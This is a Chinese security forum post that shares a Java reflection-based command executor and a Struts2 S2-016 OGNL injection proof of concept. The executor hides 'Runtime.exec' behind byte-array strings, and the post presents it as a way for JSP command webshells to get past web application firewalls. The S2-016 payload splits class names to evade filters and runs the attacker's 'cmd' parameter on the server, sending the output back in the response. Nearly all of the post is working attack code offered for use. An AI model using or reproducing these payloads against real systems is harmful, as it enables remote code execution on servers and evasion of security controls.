java reflect cmd

看了 @动后河 jsp上传cmd马却遇到防火墙的绕过方法，很久以前和 @xcoder 师傅搞过类似的东东。贴出我的执行CMD利用代码：

import java.io.InputStream;
import java.lang.reflect.Method;
import java.util.Scanner;

public class ReflectTest {

	public static String reflect(String str) throws Exception {
		String runtime = new String(new byte[] { 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 82, 117, 110, 116, 105, 109, 101 });
		Class<?> c = Class.forName(runtime);
		Method m1 = c.getMethod(new String(new byte[] { 103, 101, 116, 82, 117, 110, 116, 105, 109, 101 }));
		Method m2 = c.getMethod(new String(new byte[] { 101, 120, 101, 99 }), String.class);
		Object obj2 = m2.invoke(m1.invoke(null, new Object[] {}), new Object[] { str });
		Method m = obj2.getClass().getMethod(new String(new byte[] { 103, 101, 116, 73, 110, 112, 117, 116, 83, 116, 114, 101, 97, 109 }));
		m.setAccessible(true);
		Scanner s = new Scanner((InputStream) m.invoke(obj2, new Object[] {})).useDelimiter("\\A");
		return s.hasNext() ? s.next() : "";
	}

	public static void main(String[] args) throws Exception {
		String str = reflect("ping -c 3 baidu.com");
		System.out.println(str);
	}

}

代码中除了反射就没有其他敏感的方法。执行结果和直接调用exec是一样的，可再表层绕过某些呆滞的waf.

好久没发帖了，水一下。顺便发个s2-016比较好用的POC:java inputstream toString

redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23s%3dnew%20java.util.Scanner((new%20java.lang.ProcessBuilder(%23req.getParameter(%27cmd%27).toString().split(%27\\s%27))).start().getInputStream()).useDelimiter(%27\\A%27),%23str%3d%23s.hasNext()?%23s.next():%27%27,%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.getWriter().println(%23str),%23resp.getWriter().flush(),%23resp.getWriter().close()}&cmd=ls%20-la

替换了某些敏感的代码，然后利用java.util.Scanner去读取执行后的结果(InputStream)就再也不用担心怎么readLine了，比readFully更加方便实用。